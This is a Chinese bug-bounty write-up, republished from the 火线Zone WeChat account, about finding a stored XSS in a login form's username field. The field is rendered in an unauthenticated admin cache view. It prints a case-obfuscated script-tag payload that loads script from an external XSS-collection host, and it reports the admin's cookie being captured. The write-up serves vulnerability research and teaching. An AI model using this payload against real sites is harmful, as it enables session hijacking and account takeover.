​挖洞经验 诡异位置的存储XSS

admin 2021年4月9日18:33:50评论286 views字数 985阅读3分17秒阅读模式


/ 火线Zone欢迎投稿 /

挖洞经验 

诡异位置的存储XSS


​挖洞经验 诡异位置的存储XSS

火线Zone

【周度激励】 

1.挖洞经验 诡异位置的存储XSS

<https://t.zsxq.com/6aAAMJi>

O8 第一名:500查克拉奖励,500元现金。 

2. 智能电视漏洞回顾

<https://t.zsxq.com/QzfMzrZ> 

饭饭 第二名:300查克拉奖励,300元现金。 



一、内容介绍

登陆框处的存储XSS 高 ¥3000

二、挖掘过程

利用 未授权访问 + XSS Payload = 存储XSS

三、案例

之前在一次项目中,遇到了一个后台,此后台有账号密码,验证码等相关登陆功能,尝试弱口令等常规操作后发现没有收获,于是分析了JS。

​挖洞经验 诡异位置的存储XSS

经过分析JS后发现/index.html对应是后台地址,并且可以直接访问,访问后就如下图

​挖洞经验 诡异位置的存储XSS

可以看到只有两个功能,缓存设置和修改密码

测试修改密码功能失效,未遂

重点放在缓存设置,很幸运缓存设置没有做权限校验,可以看到当前程序请求缓存,于是乎就有了此文

​挖洞经验 诡异位置的存储XSS

于是在众多缓存中发现了我刚开始登陆的账号缓存信息,如果是错误会返回如上图ErrorXXXX_用户名的信息,最后是用户名。

于是鬼点子就来了,存储XSS!!!前台登陆处用户名使用此代码,用了一个大小写混淆的XSS

payload:

admin)"><sCRiPt sRC=[http://xss.xxxxxx></sCrIpT>](http://xss.fbisb.com/WT3n%3E%3C/sCrIpT%3E)



此时模仿管理后台人员登陆,点击缓存查看后

​挖洞经验 诡异位置的存储XSS

XSS后台收到cookie。

​挖洞经验 诡异位置的存储XSS

四、技术总结

1、细心观察遇到如下图所示的网站,不要直接就放弃。

​挖洞经验 诡异位置的存储XSS

2、通过前台登陆用户名处的XSS我也是第一次遇到,推荐白帽子们要勇于尝试,发挥想象力。

最后看完文章的小伙伴觉得有收获记得点个赞+评论,感谢大家的支持让我白嫖火线。



【火线Zone】


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~

我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!

欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!


​挖洞经验 诡异位置的存储XSS


HUOXIAN

​挖洞经验 诡异位置的存储XSS


关注火线Zone

带你解锁更多挖洞姿势


微信号 : hxanquan


本文始发于微信公众号(火线Zone):​挖洞经验 诡异位置的存储XSS

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月9日18:33:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​挖洞经验 诡异位置的存储XSShttp://cn-sec.com/archives/330924.html

发表评论

匿名网友 填写信息